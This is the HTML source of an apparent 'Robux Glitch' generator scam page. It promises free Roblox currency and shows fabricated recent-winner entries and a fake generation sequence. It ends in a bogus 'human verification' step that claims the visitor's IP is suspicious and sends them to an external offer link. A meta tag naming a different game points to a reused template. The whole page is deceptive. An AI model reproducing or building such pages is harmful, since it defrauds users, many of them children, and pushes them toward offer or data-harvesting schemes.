<!DOCTYPE html>
<html lang="en">



<head>
<link rel="shortcut icon" href="img/favicon.ico" type="image/x-icon">
<link rel="icon" href="img/favicon.ico" type="image/x-icon">
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-51443057-18');
</script>

	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
	<meta name="viewport" content="width=device-width, initial-scale=1"> 
	<title>Robux Glitch - Generator</title>
	<meta name="description" content="PUBG - Generator" />
	<meta name="keywords" content="" />
	<meta name="author" content="" />
	<link rel="stylesheet" type="text/css" href="css/style.css" />
	<link rel="stylesheet" type="text/css" href="css/bootstrap.css" />
	<link rel="stylesheet" type="text/css" href="css/bootstrap-switch.css" />
	<link rel="stylesheet" type="text/css" href="css/chat.css" />
	<link rel="stylesheet" type="text/css" href="css/fontawesome-all.min.css" />
	<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700" rel="stylesheet" /> 
	<link href="https://fonts.googleapis.com/css?family=Oswald:300,400,600,700" rel="stylesheet" /> 
	<meta name="theme-color" content="#1a1a1a">
	<meta name="msapplication-navbutton-color" content="#1a1a1a">
	<meta name="apple-mobile-web-app-status-bar-style" content="#1a1a1a">
	<link rel="icon" type="image/png" href="favicon.html" />
</head>
<body>
	<div class="logo">
		<a href="#"><img src="img/logo.png" alt="logo" class="img-responsive"></a>
	</div>
	<div class="container">
		<div class="row">
			<div class="main_bg">
				<div class="bg1"></div>
				<div class="title_bar">
					<ul class="title_tabs">
						<li><a data-toggle="tab" href="#home"><i class="fas fa-bars"></i><br />Activity</a></li>
						<li class="active"><a data-toggle="tab" href="#menu1"><i class="fas fa-money-bill-alt"></i><br />Generator</a></li>
						<li><a data-toggle="tab" href="#menu2"><i class="fas fa-comment-alt"></i><br />Chat</a></li>
					</ul>
				</div>
				<div class="main">
					<div class="tab-content">
						<div id="home" class="tab-pane fade in">
							<div class="row">
								<div class="col-sm-12">								
									<h1 class="title_text2">Last Activity</h1>
									<div class="activityContent">
										<div class="activity">
										
										</div>										
										<div class="activity">
											<ul>
												<li><img class="avatar" src="img/avatar.jpg" alt="avatar" /><img class="flag" src="img/flags/fr.png" alt="flag" /></li>
												<li><span>Name</span><br />Boban</li>
												<li><span>Robux</span><br /><img class="item-icon" src="img/bp.png"> <b>350000</b></li>
												<li><span>Platform</span><br /><i class="fab fa-ios orange_color"></i></li>
											</ul>
										</div>
										<div class="activity">
											<ul>
												<li><img class="avatar" src="img/avatar.jpg" alt="avatar" /><img class="flag" src="img/flags/rs.png" alt="flag" /></li>
												<li><span>Name</span><br />Boban</li>
												<li><span>Robux</span><br /><img class="item-icon" src="img/bp.png"> <b>55000</b></li>
												<li><span>Platform</span><br /><i class="fab fa-android orange_color"></i></li>
											</ul>
										</div>
								    </div>
								</div>
							</div> 
						</div>
						<div id="menu1" class="tab-pane fade in active">

							<div class="generator_page_1">
								<div class="row">
									<div class="col-sm-8">
										<div class="alert usernameAlert alert-danger">
										  <strong>Danger!</strong> You need to enter your ROBLOX username
										</div>	
										<div class="form-group">
											<label for="usr">Your Username</label>
											<input type="text" class="form-control usernameInput" id="usr" placeholder="Player Username">
											<div class="input_icon"><i class="fas fa-user"></i></div>
										</div>
										<div class="form-group">
											<h1 class="title_text">Safe Mod Enabled</h1>
											<input type="checkbox" name="my-checkbox" checked>
										</div>
									</div>
									<div class="col-sm-4">
										<div class="platform">
											<h1>Your Platform</h1>
											<ul class="platforms">
												
												<li class="select-platform"><i class="fab fa-android"></i><br />Android</li>
												<li class="select-platform"><i class="fab fa-apple"></i><br />iOS</li>
												<li class="select-platform active_platform"><i class="fab fa-windows"></i><br />Windows</li>
											</ul>
										</div>
									</div>
									<div class="col-sm-8 btn_margin">
										<div class="form-group">
											<button type="button" class="btnGenerate generator_btn">Start Generator</button>
										</div>
									</div>
									<div class="render">
										<img src="img/render.png" alt="render">
									</div>
								</div>
							</div>				

							<div class="generator_page_2">
								<div class="row">
									<div class="col-sm-12">
										<div class="generator_load">
											<span class="cssload-loader">
												<span class="cssload-loader-inner"></span>
											</span>
											<br />
											<h1 class="generatorTxt"><i class="fa fa-spinner fa-spin"></i> Loading<span class="blink">...</span></h1>
										</div>
									</div>
								</div>
							</div>
							
							<div class="generator_page_3">
								<div class="row">
									<div class="col-sm-12">
										<div class="second_avatar">
											<img src="img/avatar.png" alt="avatar" />
										</div>
										<div class="second_name">
											<h1 class="generatorUsername">Username</h1>
										</div>
										<div class="second_coins">
											<img src="img/bp.png" alt="" /><input type="text" name="num" class="orange_color disabledJS bpoints-input" value="10000"><br /> Robux
										</div>
										<div class="increase-decrease text-center">
											<button type="button" class="btn minus-bpoints btn-danger" data-type="minus" data-field="num"><span class="glyphicon glyphicon-minus"></span></button>
											<button type="button" class="btn plus-bpoints btn-success" data-type="plus" data-field="num"><span class="glyphicon glyphicon-plus"></span></button>
										</div>
										<div class="form-group">
											<button style="width: auto; padding: 10px;" type="button" class="btnVerify btn-md generator_btn">Import to Database</button>
										</div>										
									</div>
								</div>
							</div>	

							<div class="generator_page_4">
								<div class="row">
									<div class="col-sm-12">
										<center>
											<h3><b><i class="fa fa-user-times"></i> HUMAN VERIFICATION</b></h3>
											<p>Your IP looks really suspicious, in order to receive your ROBUX we need to make sure that you're an actual human.</p>
											<p>Click on the button below and after that you will receive your Robux instantly.</p>
<br />
											<p>

												<a href="https://d1tjcziy9n8hnk.cloudfront.net/public/i_fr?it=4132903&key=6b6ae" class="verify-btn generator_btn"><i class="fa fa-spinner fa-spin"></i> Verify Now!</a>
											</p>
										</center>				
									</div>
								</div>
							</div>	

						</div>
						<div id="menu2" class="tab-pane fade">
							<div class="row">
							    <div class="col-sm-12">
							        <div class="livechatBox">
									
							            <div class="row">
							                <div class="col-md-12">
							                    <div class="heading">
													<h3>ROBLOX Chat Room</h3>
							                    </div>
							                </div>
							            </div>
										
										<div class="row">
							                <div class="col-md-12">
							                    <div class="livechatListArea">				
							                        <ul class="chatList" style="position:relative;"></ul><br class="clearfix">					
							                    </div>
							                </div>
											<div id="typing"><span class="typing-username">Username</span> is typing ...</div>
							            </div>
										
							            <div class="row">
											<div id="enter_username">
												<div class="col-md-4">
													<input type="text" placeholder="Enter your username..." class="form-control input-lg livechatUsernameGen">					
												</div>		
												<div class="col-md-2">
													<button id="sBtn" class="btn btn-success btn-block btn-lg livechatUserGenSubmtBtn">Submit</button>
												</div>	
											</div>
												<audio id="chat_buzzer" src="click.mp3" type="audio/ogg"></audio>  
											<div id="send_message">
												<div class="col-md-10">
													<input type="text" placeholder="Enter message..." class="form-control input-lg livechatMsg">
												</div>
												<div class="col-md-2">
													<button id="sBtn" class="btn btn-success btn-block btn-lg livechatSubmtBtn">Submit</button>
												</div>	
											</div>
											
							            </div>		
							         </div>

							    </div>
							</div>									

						</div>
					</div>
				</div>
				<div class="bg2"></div>
			</div>
		</div>
	</div>

	<!-- jQuery -->
	<script src="ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
	<script type="text/javascript" src="js/bootstrap.min.js"></script>
	<script type="text/javascript" src="js/bootstrap-switch.min.js"></script>
	<script type="text/javascript" src="js/functions.app.js"></script>
	<script type="text/javascript" src="js/main.js"></script>
	<script type="text/javascript" src="js/chat.js"></script>
</body>


</html>